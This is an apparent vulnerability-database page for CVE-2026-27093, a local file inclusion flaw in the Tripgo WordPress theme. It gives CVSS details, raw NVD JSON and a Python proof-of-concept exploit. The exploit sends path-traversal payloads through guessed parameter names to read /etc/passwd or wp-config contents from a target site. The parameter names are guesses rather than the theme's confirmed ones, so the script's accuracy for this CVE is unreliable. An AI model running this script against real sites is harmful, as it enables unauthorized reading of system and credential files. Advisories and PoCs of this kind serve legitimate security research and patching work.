Security Vulnerability Report
中文
CVE-2026-27093 CVSS 8.1 HIGH

CVE-2026-27093

Published: 2026-03-19 07:15:59
Last Modified: 2026-04-23 15:37:19

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ovatheme Tripgo tripgo allows PHP Local File Inclusion.This issue affects Tripgo: from n/a through < 1.5.6.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Tripgo < 1.5.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-27093 PoC - Local File Inclusion in ovatheme Tripgo # Affected: Tripgo Theme < 1.5.6 def exploit_lfi(target_url, filename='/etc/passwd'): """ Exploit Local File Inclusion vulnerability Args: target_url: Base URL of the vulnerable WordPress site filename: Local file to read (default: /etc/passwd) """ # Common vulnerable parameters in Tripgo theme vulnerable_params = [ 'file', 'page', 'template', 'include', 'action' ] for param in vulnerable_params: # Try path traversal to include local file payload = f"../../../../../../../../{filename}" try: response = requests.get( target_url, params={param: payload}, timeout=10, verify=False ) # Check if file content was returned if response.status_code == 200: if 'root:' in response.text or 'daemon:' in response.text: print(f"[!] Successfully exploited via parameter: {param}") print(f"[+] File content:\n{response.text[:500]}") return True elif 'wp-config' in response.text.lower(): print(f"[!] Found wp-config.php content via parameter: {param}") return True except requests.RequestException as e: print(f"[-] Error with parameter {param}: {e}") return False def main(): if len(sys.argv) < 2: print("Usage: python cve-2026-27093.py <target_url> [file_to_read]") print("Example: python cve-2026-27093.py http://target.com/wp-content/themes/tripgo") sys.exit(1) target = sys.argv[1] file_to_read = sys.argv[2] if len(sys.argv) > 2 else '/etc/passwd' print(f"[*] Target: {target}") print(f"[*] Attempting to read: {file_to_read}") if exploit_lfi(target, file_to_read): print("[+] LFI Exploitation successful!") else: print("[-] Exploitation failed or target not vulnerable") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27093", "sourceIdentifier": "[email protected]", "published": "2026-03-19T07:15:59.410", "lastModified": "2026-04-23T15:37:19.487", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ovatheme Tripgo tripgo allows PHP Local File Inclusion.This issue affects Tripgo: from n/a through < 1.5.6."}, {"lang": "es", "value": "La vulnerabilidad de control inadecuado del nombre de fichero para la declaración include/require en un programa PHP ('Inclusión remota de ficheros PHP') en Ovatheme Tripgo permite la inclusión local de ficheros PHP. Este problema afecta a Tripgo: desde n/a antes de 1.5.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/tripgo/vulnerability/wordpress-tripgo-theme-1-5-3-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}